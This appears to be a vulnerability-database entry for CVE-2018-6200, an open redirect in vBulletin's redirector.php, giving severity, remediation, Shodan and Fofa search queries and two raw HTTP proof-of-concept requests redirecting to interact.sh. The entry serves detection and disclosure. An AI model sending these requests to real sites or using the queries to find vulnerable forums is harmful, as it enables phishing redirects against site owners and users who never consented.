🔙 목록으로 돌아가기

CVE-2018-6200: vBulletin - Open Redirect

TitlevBulletin - Open Redirect
Author0x_Akoko,daffainfo
SeverityMedium
ImpactAn attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
RemediationApply the latest security patches and updates provided by vBulletin to fix the open redirect vulnerability.
CVSS Score6.1
EPSS Score0.29986
CVE IDCVE-2018-6200
CWE IDCWE-601
Shodan Queryhttp.title:"powered by vbulletin"http.html:"powered by vbulletin"http.component:"vbulletin"cpe:"cpe:2.3:a:vbulletin:vbulletin"
Fofa Querybody="powered by vbulletin"title="powered by vbulletin"
Tags cve cve2018 redirect vbulletin vuln

🔍 Vulnerability Description

vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /redirector.php?url=https://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /redirector.php?do=nodelay&url=https://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-6200.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-6200.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A